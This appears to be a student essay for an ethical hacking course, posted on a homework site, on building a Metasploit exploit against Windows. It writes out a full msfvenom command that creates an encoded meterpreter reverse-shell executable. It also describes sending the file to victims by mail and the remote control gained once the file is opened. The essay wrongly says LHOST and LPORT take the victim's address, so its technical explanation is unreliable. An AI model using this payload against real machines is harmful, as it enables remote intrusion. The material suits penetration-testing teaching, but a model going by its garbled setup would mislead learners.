Kali Linux Exploit using Metasploit

Verified

Added on 2023/06/04

AI Summary

This article explains how to develop an exploit code using Metasploit on Kali Linux to hack into a victim's Windows operating system without physically logging in. The article covers the requirements, commands, and activities that can be done on the victim's machine. The article is relevant to ICT Ethical Hacking courses and students interested in cybersecurity.

Contribute Materials

Your contribution can guide someone’s learning journey. Share your documents today.

Running Head: ICT ETHICAL HACKING 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.

💎 Get Pro

ICT ETHICAL HACKING 2
The exploit developed was specifically a target to windows operating systems using
metasploit. Through the approach, I would be in a position to get into the victims computer
operating on windows platform without physically logging into the system. In its simple
definition, metasploit is a project that aids in penetration testing and ID signature
development. Using the tool, an exploit code can be developed and executed against remote
machines (Dieterle, 2016).
Some of my requirements in this development included metaSploit framework and a
Ruby containing all the Ruby packages which I installed in a Kali Linux OS machine, two OSs
(Kali Linux and Windows) installed in two different machines although at the same NAT
network. I also ensured that the target machine did not have any Antivirus running on it (Holik,
Horalek, Marik, Neradova & Zitta, 2014, p.240). The most important Metasploit Framework
command I used throughout this exploit was the Msfconsole because of its flexibility, features
and its support to the tools within the framework. The command provided me with a handy all-
in-one interface in almost all the settings under the framework.
To be able to hack into the victim’s windows operating system machine, I would need the
machines IP address and one of its PORT number which I would easily obtain since we are at the
same network with the machine. Basically, in the same network each machine‘s IP address in
that network can be viewed through any other machine under the same network if the network
administrator has not reconfigured the machines otherwise (Muniz, 2013).
An executable file is therefore created under the IP and port specifications under the Kali
Linux platform through the Msfconsole command “msfvenom –p
windows/meterpreter/reverse_tcp LHOST= (IP address of windows machine) LPORT=(PORT in
the windows machine) –f exe –e x86/shikata_ga_nai –i 10> /root/desktop/ (desktop name).exe”

ICT ETHICAL HACKING 3
Through this command, a file is created on the Kali Linux machine and which cannot be
executed in the same platform considering the format which we have used. It appears like a
folder in this platform and which must be send to the victim through any available channel
including mail (Pritchett & De Smet, 2013).
Once the file is send, the attacker is entitled to set the metasploit platform into a listening
status using the command “exploit” while the Msfconsole command is on a handler status. So,
when set on a listening state, it awaits until the file send to the windows victim machine is
opened. Whenever the victim opens the file which has been send to his windows machine, on the
side of the attacker, the “meterpreter” option opens itself automatically.
At the point, there are a lot that can be done on the victim’s machine by the attacker as
observed when the command “help” is executed. Some of the activities the attacker can do on the
victim’s machine include reading the contents of the files on the screen, changing directories,
editing files, deleting files, searching for files, uploading files changing local directories, printing
local directories, removing directories, moving source to destination, and printing working
directories (Weidman, 2014). These activities can be achieved through different commands and
which are listed in the help command.
Considering these activities sends a clear picture that the attacker will have achieved full
control of the victim’s machine without any knowledge of his or her password to an extend of
shutting it down remotely.

ICT ETHICAL HACKING 4
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent
Publishing Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective
penetration testing with Metasploit framework and methodologies. In Computational
Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp.
237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.

1 out of 4

+13062052269

info@desklib.com

Kali Linux Exploit using Metasploit

Contribute Materials

Secure Best Marks with AI Grader

Related Documents

Kali Linux Exploit using Metasploit for Windows OS

Kali Linux Exploit using Metasploit for Ethical Hacking

Kali Linux Exploit using Metasploit

Kali Linux Exploit using Metasploit for Windows OS

Workshop - Exploit Development

ICT Ethical Hacking